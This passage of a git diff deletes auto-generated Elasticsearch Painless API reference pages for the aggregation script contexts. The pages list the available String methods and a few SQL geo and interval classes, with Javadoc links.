-[role="exclude",id="painless-api-reference-aggs-combine-java-lang"] -=== Aggs Combine API for package java.lang -See the <> for a high-level overview of all packages and classes. 
- -[[painless-api-reference-aggs-combine-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean 
{java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-aggs-init/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-aggs-init/index.asciidoc deleted file mode 100644 index 6fcf22ba13d..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-aggs-init/index.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-aggs-init]] -=== Aggs Init API - -The following specialized API is available in the Aggs Init context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-aggs-init/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-aggs-init/packages.asciidoc deleted file mode 100644 index c54209d9835..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-aggs-init/packages.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-aggs-init-java-lang"] -=== Aggs Init API for package java.lang -See the <> for a high-level overview of all packages and classes. 
- -[[painless-api-reference-aggs-init-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean 
{java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-aggs-map/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-aggs-map/index.asciidoc deleted file mode 100644 index 2a92287889f..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-aggs-map/index.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-aggs-map]] -=== Aggs Map API - -The following specialized API is available in the Aggs Map context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-aggs-map/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-aggs-map/packages.asciidoc deleted file mode 100644 index 1cbdc72c725..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-aggs-map/packages.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-aggs-map-java-lang"] -=== Aggs Map API for package java.lang -See the <> for a high-level overview of all packages and classes. 
- -[[painless-api-reference-aggs-map-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean 
{java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-aggs-reduce/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-aggs-reduce/index.asciidoc deleted file mode 100644 index ada5a7ffb2f..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-aggs-reduce/index.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-aggs-reduce]] -=== Aggs Reduce API - -The following specialized API is available in the Aggs Reduce context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-aggs-reduce/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-aggs-reduce/packages.asciidoc deleted file mode 100644 index 4ef0fd11334..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-aggs-reduce/packages.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-aggs-reduce-java-lang"] -=== Aggs Reduce API for package java.lang -See the <> for a high-level overview of all packages and classes. 
- -[[painless-api-reference-aggs-reduce-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean 
{java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-aggs/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-aggs/index.asciidoc deleted file mode 100644 index 9cfe9531fab..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-aggs/index.asciidoc +++ /dev/null @@ -1,31 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-aggs]] -=== Aggs API - -The following specialized API is available in the Aggs context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -==== org.elasticsearch.xpack.sql.expression.literal.geo -<> - -* <> - -==== org.elasticsearch.xpack.sql.expression.literal.interval -<> - -* <> -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-aggs/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-aggs/packages.asciidoc deleted file mode 100644 index 3213ce2dbf6..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-aggs/packages.asciidoc +++ /dev/null @@ -1,91 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-aggs-java-lang"] -=== Aggs API for package java.lang -See the <> for a high-level overview of all packages and classes. 
- -[[painless-api-reference-aggs-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean 
{java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - -[role="exclude",id="painless-api-reference-aggs-org-elasticsearch-xpack-sql-expression-literal-geo"] -=== Aggs API for package org.elasticsearch.xpack.sql.expression.literal.geo -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-aggs-GeoShape]] -==== GeoShape -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-aggs-org-elasticsearch-xpack-sql-expression-literal-interval"] -=== Aggs API for package org.elasticsearch.xpack.sql.expression.literal.interval -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-aggs-IntervalDayTime]] -==== IntervalDayTime -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-aggs-IntervalYearMonth]] -==== IntervalYearMonth -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-analysis/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-analysis/index.asciidoc deleted file mode 100644 index 491bc49ae06..00000000000 --- 